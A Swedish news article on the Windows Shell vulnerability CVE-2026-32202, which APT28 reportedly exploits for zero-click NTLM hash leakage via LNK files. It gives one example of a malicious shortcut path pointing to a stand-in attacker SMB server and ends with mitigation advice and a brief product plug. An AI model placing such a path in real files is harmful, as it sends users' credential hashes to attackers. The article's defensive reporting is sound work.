Hoppa till huvudinnehåll Hoppa till sökning Hoppa till huvudnavigering
Meny
Viktigt Cybersäkerhet Poäng: 8/10

Windows Shell-lucka: Fancy Bear utnyttjar zero click-sårbarhet för NTLM-angrepp

Microsoft lagar på nytt Windows Shell-sårbarheten CVE-2026-32202 efter en otillräcklig februaripatch. APT28 använder en zero click-exploit för automatisk NTLM-autentisering.

Vad har hänt? – ny Windows Shell-sårbarhet efter otillräcklig patch

Microsoft ställs på nytt inför en kritisk säkerhetslucka i Windows Shell. Efter att cyberligan APT28, känd som Fancy Bear, redan hade utnyttjat sårbarheten CVE-2026-21510 i det vilda visade sig Microsofts februaripatch vara otillräcklig. Den bristfälliga programfixen lämnade efter sig en ny säkerhetslucka, CVE-2026-32202, som nu också angrips aktivt.

Microsoft har klassat den nya sårbarheten med ett CVSS-värde på 4,3 (risknivå ”medel”) och åtgärdade den vid april månads patchdag. Under måndagen uppdaterade utvecklarna dock sårbarhetsposten med ett oroande besked: spoofing-luckan i Windows Shell missbrukas numera av illasinnade aktörer i det vilda.

Detaljerna – zero click-exploit möjliggör automatisk NTLM-autentisering

Medan Microsoft bedömer den nya sårbarhetens konsekvenser som mindre allvarliga än den ursprungliga luckans, tecknar en analys från Akamai en mer oroande bild. IT-säkerhetsexperterna klassificerar CVE-2026-32202 som en zero click-sårbarhet – till skillnad från Microsofts bedömning att offren måste köra en skadlig fil.

Problemet ligger i en förbisedd kodväg: Windows Utforskaren försöker automatiskt vid visning av kataloger extrahera ikoner för målfilerna ur LNK-filer. Därvid sker en sökvägskontroll som kan upprätta en anslutning till främmande SMB-servrar – utan ytterligare användarinteraktion.

Angreppsmekanismen i detalj

Angreppet fungerar på följande sätt: en LNK-fil innehåller en genväg till en fjärrserver, exempelvis ”\\attacker.com\share\payload.cpl”. Så snart offret öppnar motsvarande katalog upprättar datorn automatiskt en anslutning till SMB-servern och startar en NTLM-autentisering. Därvid överförs offerdatorns Net-NTLMv2-hash till angriparna.

Dessa hashvärden kan sedan missbrukas för NTLM-relay-attacker och offline-knäckning, vilket öppnar långtgående möjligheter för angriparna till följdangrepp.

Sammanhang – varför denna sårbarhet är särskilt farlig

Faran med denna sårbarhet ligger i dess skenbara harmlöshet. Medan den ursprungliga luckan CVE-2026-21510 möjliggjorde körning av skadlig kod från nätet framstår den nya sårbarheten vid första anblicken som mindre hotfull. Microsoft beskriver den som en spoofing-lucka med medelhög risk.

I själva verket ger den dock angriparna zero click-åtkomst till känsliga autentiseringsuppgifter. I företagsmiljöer, där säkerhetssystem som passerkontroll och kameraövervakning ofta administreras via nätverket, kan komprometterade NTLM-hashar öppna vägen in i kritisk säkerhetsinfrastruktur.

Att APT28/Fancy Bear – en statsstödd hackargrupp – redan utnyttjar båda sårbarheterna understryker dessa angreppsvektorers strategiska betydelse för professionella cyberbrottslingar.

Praktiska tips – omedelbara åtgärder för IT-ansvariga

IT-administratörer bör omgående vidta följande åtgärder:

  • Installera patchen omedelbart: Microsofts apriluppdatering måste ofördröjligen installeras på samtliga Windows-system
  • Nätverksövervakning: Bevaka SMB-anslutningar till externa servrar, i synnerhet oväntade autentiseringsförsök
  • E-postsäkerhet: Skärpt filtrering av e-postbilagor, särskilt LNK-filer
  • NTLM-härdning: Granska och skärp NTLM-konfigurationen i Active Directory

Särskild uppmärksamhet bör operatörer av kritisk infrastruktur såsom säkerhetssystem iaktta. Inkastskåp, kollektskåp och moderna passerkontrollsystem är ofta nätverksbaserade och skulle kunna bli angripbara via komprometterade administratörskonton.

Utblick – lärdomar och kommande utveckling

Fallet visar tydligt utmaningarna med att patcha komplexa programsystem. En ofullständig patch kan skapa nya angreppsvektorer som erfarna angripare snabbt identifierar och utnyttjar.

För säkerhetsbranschen innebär det en förstärkning av trenden mot zero trust-arkitekturer. Traditionella perimeterbaserade säkerhetskoncept når sina gränser när angriparna redan förfogar över legitima autentiseringsuppgifter.

Microsoft har aviserat att man i grunden ska göra om autentiseringen i Active Directory. Det skulle på medellång sikt kunna leda till att man överger de föråldrade NTLM-koncepten, som sedan år tillbaka betraktas som en säkerhetsrisk.

Företag bör ta denna utveckling som anledning att se över hela sin säkerhetsstrategi. Moderna lösningar som Wardhub för central administration av säkerhetssystem kan bidra till att skydda kritiska områden även vid komprometterad nätverksinfrastruktur.

Hotbilden kommer att fortsätta skärpas, eftersom statsstödda grupper som APT28 kontinuerligt utvecklar nya angreppsvektorer. Proaktiva säkerhetsåtgärder och snabba patchcykler blir därmed en affärskritisk nödvändighet.